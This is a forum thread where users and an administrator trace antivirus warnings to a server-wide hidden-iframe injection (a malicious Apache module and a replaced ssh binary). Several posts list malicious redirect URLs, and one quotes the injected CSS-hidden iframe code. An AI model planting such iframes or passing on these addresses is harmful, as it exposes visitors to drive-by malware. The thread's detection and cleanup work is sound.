Avast Detecting Malicious URL

About once a week for the past month or so Avast detects and blocks a malicious URL on a seemingly random page of the Forums.
Each time I check the Page Source, via my browser, the offending URL is found to be within the Head HTML tag.
Is anybody else getting these warnings and is there anything being done about this?

what is the offending url and on what page are you getting the warning?

yojawahimu dot longmusic dot com/ieosj9zxwedyd78c/dd23f248a65be260db78b1a1101d8116/
The warning came up when I visited this thread: Thread 126922
Though visiting the page now doesn’t result in the warning being displayed.
Also it’s now not shown in the page source hence it seems to be loaded into random pages at random times.

should be fixed now

Thanks.
Any idea how it got into the code?

I’m getting this in Avast too. Happens when I’m on the first page of the Video Game Music Downloads.

are you getting it now or were before, gao?

uptown: still looking into that

McAfee also detects this. It doesn’t block the page outright, but it comes up with a header saying malicious content from this site has been blocked. It too appears to happen randomly: it’s skipped between the main forum page to my settings panel to threads I’ve been viewing.

is it still happening?

I have no idea: the pages it chose to attack are at random. The only way to tell would be to refresh the page again and again to see what happens.

i believe the problem is fixed, let me know if it happens again

I had another warning just now with a similar URL to the last time.

avast still giving me the warning massage when i try to brwose any soundtrack

God, this site must be a horrible den of evil people, malicious content, nudity, lewd comments, and snappy comebacks.

*Takes a look at the "Not completely about cats" thread.

I can see why Avast hates us.

I am getting these errors randomly too. Once every week I’d say. And from the same link uptown posted, "longmusic.com"

WebRoot SecureAnyWhere randomly detects viruses here as well, this is a problem that needs to be fixed ASAP.

trying to figure out what’s going on now

I just had this happen to me… Not sure why but Avast handled it

ok, just noticed the thread.

I am an "avaster" as well, and yes, from time to time when logging in here, avast tells me it found malware. I am in no specific thread then, just logging in.
Has not happened the past few days.

i need people to do me a favor

1) write down the exact url that it’s found at and put it in here

2) save the page and post it here or send it to my email ([email protected])

will help me diagnose this. thanks !

i need people to do me a favor

1) write down the exact url that it’s found at and put it in here

2) save the page and post it here or send it to my email ([email protected])

will help me diagnose this. thanks !

I wish Avast would let you copy the URL from its shield, but strangely it doesn’t. You can only view the last blocked URL too.

Just happened again!

http://kgfbfkjp.myftp.biz/2khmlizxwm1lj0

should be fixed.

if anyone’s still getting this let me know, thanks

Sarah,

I’m not sure about other people’s antivirus programs, but for mine, Webroot SecureAnywhere, it appears to be some kind of long number sequence exe virus that tries to attack my AppData folder, that’s why it’s detecting it, the virus tried to strike 4 times just now according to my Quarantine log. Looking at my quarantine log, that’s what the virus has been when it tries to attack when I log in here every once in a while. I don’t know what to tell you or where it originated from! So sorry this is happening, gotta be frustrating. 🙁

Just happended to me using Avast on entering the site in the film,tv and classical music forum some minutes ago. The bloqued url seems to be

//qphmwp.sytes.net/5r2z8ezxwogovo5v/…/

Norton just detected this:

when I went to Not completely about SCIENCE shoot the shit gifs DSi 2 XL 64 CD (NSFW) page.
JonC

Norton just detected this:

when I went to Not completely about SCIENCE shoot the shit gifs DSi 2 XL 64 CD (NSFW) page.
JonC

Which page specifically and how many posts per page do you have set to show in threads?

Got a warning while visiting http://forums.ffshrine.org/f72/aatis-v0-thread-%5Bproper-tags%5D-%5B-flac%5D-98119/5.html#post2298199
Due to this in the head tag of the source code:

< style>.k8oj1h { position:absolute; left:-1813px; top:-1675px} < /style> < div class="k8oj1h">< iframe src="http://dimcuzvl.myftp.biz/2bwo0mzxw2mn32nv/dd23f248a65be260db78b1a1101d8116/" width="381" height="392">< /iframe>< /div>

Avast detected a virus when I visited here too.. But it seems to have stopped now, for me anyway.

Just found another when first opening VGM download forums.
http://gcrulysz.myvnc.com/ygikekzxwf0vy/dd23f248a65be260db78b1a1101d8116/

I just got another avast warning in the film, tv and classical music download forum:

It blocked this adress:

http://rouhyrdhw.servehttp.com/srkdwzxwu…

It was in the forum front page with 30 threads per page.

Thanks for taking this seriously! Pages on this forum are already getting blacklisted by Google.

AVG detects the problem as Invisible IFrame Injection (type 1707). The injection on my last visit was as follows:

(edit: code removed due to false positives)

And the injection on my visit before that was (differences in red):

(edit: code removed due to false positives)

Please don’t visit the above URLs! Anyway, you’re looking for malicious code that randomizes a few bits, fetches the current attack url (which probably changes every few minutes) from an outside control server, then injects the iframe code for that url, with css to shift it out of view. Good luck!

just got back from being out of town, still looking into this

I’ve managed to reliably repeat the conditions for malicious code insertion by spoofing a Firefox on Windows useragent on my Linux box, clearing forums.ffshrine.org cookies, changing my IP address, following a Google hit to any page on this forum. Let me know if you need more samples.

Every time I restart Opera browser, I got this error message while accessing the FFShrine forums. This issue popped up a about a week ago. Only Opera gives me this error, Firefox & Chrome are good.
Can anybody please look into it?

(http://imageshack.us/photo/my-images/96/51361777.jpg/)

Uploaded with ImageShack.us (http://imageshack.us)

Every time I restart Opera browser, I got this error message while accessing the FFShrine forums. This issue popped up a about a week ago. Only Opera gives me this error, Firefox & Chrome are good.
Can anybody please look into it?

(http://imageshack.us/photo/my-images/96/51361777.jpg/)

Uploaded with ImageShack.us (http://imageshack.us)

Same here. :confused:

it should be fixed now, let me know if anyone else still gets this

(not including opera warnings– those will take a while to go away)

it should be fixed now, let me know if anyone else still gets this

(not including opera warnings– those will take a while to go away)
Good to know you’re on the ball about this; I am curious as to whether you’ve been able to contact the relevant folks at Opera and explain what you’ve done to address the issue.

It’s still inserting the iframes, sorry. But the semi-good news is that every website on this server is compromised. Even squarenation.com’s bare bones directory listing has the malicious iframe inserted. It might be out of your hands; tell your web host the entire server is hacked.

Yeah I’m still getting the warning.
It popped up when I visited this page.
Same iframe insertion as before but with a different URL:

http://bjxbalhswd.sytes.net/rewvp1zxwxliibene/dd23f248a65be260db78b1a1101d8116/

Still getting injections.

I found that the security folks at Unmask Parasites have run into this critter before. They tracked it down to a malicious Apache module, which explains the server-wide infection. The intruder got root access to put it there, and you’ll need root access to clean it. Check the below link for help.

Malicious Apache Module Injects Iframes (http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/)

doing a fresh install of apache and changing root passwords, let me know again if you still get the warnings

and thanks for the detective work 🙂

Still getting injections.

I found that the security folks at Unmask Parasites have run into this critter before. They tracked it down to a malicious Apache module, which explains the server-wide infection. The intruder got root access to put it there, and you’ll need root access to clean it. Check the below link for help.

Malicious Apache Module Injects Iframes (http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/)

doing a fresh install of apache and changing root passwords, let me know again if you still get the warnings

and thanks for the detective work 🙂

Is that what caused me to get this (Thread 129326) a while ago?

and thanks for the detective work

My pleasure. I think you’re clean.

When you’re feeling confident, you can go through Google webmaster tools (http://www.google.com/webmasters/tools/) to get the following blacklisted pages rechecked:

http://forums.ffshrine.org/f72/idolm-ster-master-artist-albums-44223/56.html
Thread 68358

Is that what caused me to get this a while ago?
Yup. Hug your antivirus. Hidden iframes are only used for evil, but not all AVs are equally good at detecting them. Anyone whose AV has complained about iframes on this site is fine. Anyone whose AV hasn’t complained about iframes on this site (i.e., let the iframe through) should run a scan, just in case one slipped through the blacklists.

I think you’re clean.

When you’re feeling confident, you can go through Google webmaster tools (http://www.google.com/webmasters/tools/) to get the following blacklisted pages rechecked:

http://forums.ffshrine.org/f72/idolm-ster-master-artist-albums-44223/56.html
Thread 68358

Oh, I wasn’t worried. AVG blocked the threat. I was just curious if what you mentioned is what caused that.

sent a request to google, last time it took a while tho

i had spent so many hours looking through the vb code it never occurred to me it could’ve been apache itself D:

sent a request to google, last time it took a while tho

i had spent so many hours looking through the vb code it never occurred to me it could’ve been apache itself D:

Is that why AVG just blocked another iFrame? Because Google still has it listed as dangerous?

apparently we’re not entirely out of the woods yet but i’m working on it ~

apparently we’re not entirely out of the woods yet but i’m working on it ~

Keep up the good work, Sarah. 🙂

Bummer. I’m pretty sure you were clean, at least for a little bit. Make sure the intruder doesn’t have a way to root you again, for instance, having a silent keylogger on any computer you or another admin logs in from.

Anyway, some more info for you: The sec folks call this infection Linux/Chapro.A, the underground calls it Darkleech. It’s been around a few months, so maybe a Linux AV program can help with the cleaning.

it’s more nasty than it sounds, apparently the ssh binary was replaced and sending login info. still working on removing it

out of curiosity what do you do for a living xD surprised anyone on here knows this much about this stuff

it’s more nasty than it sounds, apparently the ssh binary was replaced and sending login info. still working on removing it

out of curiosity what do you do for a living xD surprised anyone on here knows this much about this stuff

Do you think it’d be a good idea to close down the forum until you get rid of this, Sarah? And I don’t mean simply turning it off via vBulletin so we see the "off" message, but actually making it non-accessible.

As Eastern West pointed out, not all virus programs catch this, so some people could run into problems.

we should be clean

Confirming, looks clean to me.

I’m in environmental health, going back to grad school for my MPH in epidemiology soon. Malware outbreaks are good practice for real world ones.

As you said earlier Sarah, it will be a while until Opera is fixed. Still getting the same error from Opera…I am gonna try Firefox instead.

Edit: No warnings from Firefox.http://smileys.on-my-web.com/repository/Happy/happy-thumb-up-045.gif

Getting avast threat detected on this thread. When I click page 2 it detects the threat and blocks the page.

Note: Using Firefox

Getting avast threat detected on this thread. When I click page 2 it detects the threat and blocks the page.

Note: Using Firefox

Try clearing your data.

Try clearing your data.

Getting the same with IE…… What Data am I supposed to try clearing?

Try clearing your data.

Getting the same with IE…… What Data am I supposed to try clearing?

Says Iframe infection.

Getting the same with IE…… What Data am I supposed to try clearing?

Says Iframe infection.

Browser data.

You might be stuck from when it had the problem.

I get the same just on that page.
I’m guessing it may be due to the snippet of code I or someone else posted demonstrating the original issue we had.

I get the same just on that page.
I’m guessing it may be due to the snippet of code I or someone else posted demonstrating the original issue we had.

Yeah that page is still blocked out for me as well!

it may be due to the snippet of code
Good catch. I edited my post, hopefully that’ll prevent false positives from Avast.

Got another one, on Thread 132896

Web Hosting, Shared Web Hosting, Virtual Private Server, Dedicated Servers by DreamHost ()

Got another one
Looks fine to me. Are you sure your machine is clean? It looks like a spam link got inserted into your post.